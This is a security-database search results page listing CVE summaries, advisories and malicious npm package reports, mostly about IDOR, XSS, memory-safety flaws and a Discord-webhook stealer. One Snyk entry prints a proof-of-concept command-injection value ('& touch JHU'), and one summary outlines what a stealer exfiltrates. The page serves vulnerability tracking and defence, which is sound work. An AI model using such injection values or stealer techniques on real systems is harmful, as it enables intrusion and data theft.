Lucene search
K

19 matches found

Cvelist
Cvelist
added 2026/05/28 4:25 p.m.30 views

CVE-2026-41141 EspoCRM: IDOR in EmailTemplate Prepare Endpoint Leaks Entity Data via Email Address Lookup

EspoCRM is an open source customer relationship management application. Prior to 9.3.5, the POST /api/v1/EmailTemplate/:id/prepare endpoint accepts an emailAddress parameter and resolves the owning entity Contact, Lead, Account, or User without performing an ACL check. An authenticated user with...

6.5CVSS0.00346EPSS
Exploits0References1
CVE
CVE
added 2026/05/28 4:25 p.m.19 views

CVE-2026-41141

EspoCRM prior to 9.3.5 is vulnerable via POST /api/v1/EmailTemplate/:id/prepare where providing an emailAddress lets an authenticated user with EmailTemplate read permission resolve the owning entity (Contact/Lead/Account/User) without ACL checks, leaking all field values and bypassing read: own/...

6.5CVSS5.8AI score0.00346EPSS
Exploits0References1
CNNVD
CNNVD
added 2026/05/08 12:0 a.m.9 views

IP 跨站脚本漏洞

IP is an open-source IP address query and display tool developed by th30d4y. Versions of IP from 1.0.1 to 2.0.1 contained a cross-site scripting vulnerability. This vulnerability stemmed from insufficient cleaning of user input, which could lead to cross-site scripting attacks based on DOM...

6.1CVSS5.6AI score0.00181EPSS
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/04/24 1:35 a.m.10 views

Malicious code in amplitude-ma-ts (npm)

npm stealer. Hardcoded Discord webhook id 1497047226428690432 in postinstall Folder/bin/S.js. Exfils hostname, whoami, pwd, publicip api.ipify.org, /etc/hosts via Discord embed. v1.0.21 empty placeholder, v1.0.22 shipped payload — name-squat-then-poison. Typosquats @amplitude/ analytics scope...

5.8AI score
Exploits0
OSV
OSV
added 2025/09/15 2:15 p.m.5 views

UBUNTU-CVE-2022-50240

In the Linux kernel, the following vulnerability has been resolved: android: binder: stop saving a pointer to the VMA Do not record a pointer to a VMA outside of the mmaplock for later use. This is unsafe and there are a number of failure paths after the recorded VMA pointer may be freed during...

7.8CVSS5.8AI score0.00153EPSS
Exploits0References4
Gitee
Gitee
added 2025/09/13 5:2 a.m.98 views

peda

This repository is an offensive tool for exploit development. It is a Python Exploit Development Assistance for GDB PED A, which is a script that helps speed up the exploit development process on Linux/Unix. The tool is designed to work with GDB 7.x and Python 2.6+. The tool has various features,...

6.8AI score
Exploits0
OSV
OSV
added 2023/09/12 10:15 p.m.4 views

DEBIAN-CVE-2023-4813

A flaw has been identified in glibc. In an uncommon situation, the gaihinet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with...

5.9CVSS6.1AI score0.01669EPSS
Exploits0References1
SUSE CVE
SUSE CVE
added 2023/02/15 3:57 a.m.1 views

SUSE CVE-2020-14354

A possible use-after-free and double-free in c-ares lib version 1.16.0 if aresdestroy is called prior to aresgetaddrinfo completing. This flaw possibly allows an attacker to crash the service that uses c-ares lib. The highest threat from this vulnerability is to this service availability...

3.3CVSS7AI score0.00529EPSS
Exploits1References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2023/02/06 12:29 a.m.4 views

Malicious code in fc-address-lookup (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 5feb9e0be7037fdbecf7bb66bc86bef489c699497fb662d27506efc7f03889ca Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

6.9AI score
Exploits0References1
OSV
OSV
added 2023/02/06 12:29 a.m.6 views

MAL-2023-330 Malicious code in fc-address-lookup (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 5feb9e0be7037fdbecf7bb66bc86bef489c699497fb662d27506efc7f03889ca Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

7AI score
Exploits0References1
Citrix
Citrix
added 2022/07/06 12:0 a.m.7 views

CWA for Android: We were unable to tunnel through the proxy

Viewer of CWA for Android fail to establish connection to VDA with below given error message We were unable to connect through the proxy. Error - 0 Logs show following error logs 02-10 05:44:55.989 1117 28821 W System.err: Caused by: android.system.GaiException: androidgetaddrinfo failed: EAINODA...

7AI score
Exploits0
OSV
OSV
added 2021/07/31 11:3 a.m.4 views

OESA-2021-1291 nodejs security update

Node.js is a platform built on Chrome's JavaScript runtime for easily building fast, scalable network applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, perfect for data-intensive real-time applications that run across distributed devices...

5.3CVSS6.6AI score0.23132EPSS
Exploits1References2
Snyk
Snyk
added 2020/12/04 5:35 p.m.4 views

Command Injection

Overview macfromip is a module that gets a MAC address from a LAN IP address Affected versions of this package are vulnerable to Command Injection. The injection points are located in lines 66 and 96 in macfromip.js. PoC var a = require"macfromip"; a.getMacInLinux"& touch JHU", function;...

9.8CVSS7.2AI score0.02046EPSS
Exploits1References2
Openbugbounty
Openbugbounty
added 2017/11/01 4:13 p.m.12 views

ip-address-lookup-v4.com XSS vulnerability

Open Bug Bounty ID: OBB-385141 Description| Value ---|--- Affected Website:| ip-address-lookup-v4.com Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Preventio...

6.3AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2015/01/08 12:0 a.m.45 views

CentOS 6 : glibc (CESA-2015:0016)

Updated glibc packages that fix two security issues and two bugs are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System CVSS base scores, which give detailed severity ratings, are...

5CVSS8.2AI score0.06564EPSS
Exploits1References3
OSV
OSV
added 2013/07/21 8:18 p.m.4 views

MGASA-2013-0228 Updated squid packages fix security vulnerabilities

Due to incorrect data validation Squid is vulnerable to a buffer overflow attack when processing specially crafted HTTP requests. This problem allows any trusted client or client script who can generate HTTP requests to trigger a buffer overflow in Squid, resulting in a termination of the Squid...

7.5CVSS8.8AI score0.80451EPSS
Exploits0References6
NVD
NVD
added 2007/03/06 1:19 a.m.18 views

CVE-2006-7122

Cross-site scripting XSS vulnerability in the IP Address Lookup functionality in BSQ Sitestats component for Joomla 1.8.0, and possibly other versions before 2.2.1, allows remote attackers to inject arbitrary web script and HTML via the ip parameter...

6.8CVSS5.9AI score0.01182EPSS
Exploits0References5
CVE
CVE
added 2007/03/06 1:0 a.m.51 views

CVE-2006-7122

CVE-2006-7122 is a cross-site scripting (XSS) issue in the IP Address Lookup of BSQ Sitestats for Joomla. Affects 1.8.0 and possibly earlier versions; vulnerable parameter: ip. Exploitation could inject arbitrary script/HTML. Remediation: upgrade to a version containing the fix (2.2.1) or apply t...

6.8CVSS6.1AI score0.01182EPSS
Exploits0References5Affected Software1
Cvelist
Cvelist
added 2007/03/06 1:0 a.m.24 views

CVE-2006-7122

Cross-site scripting XSS vulnerability in the IP Address Lookup functionality in BSQ Sitestats component for Joomla 1.8.0, and possibly other versions before 2.2.1, allows remote attackers to inject arbitrary web script and HTML via the ip parameter...

5.9AI score0.01182EPSS
Exploits0References5
Rows per page
Query Builder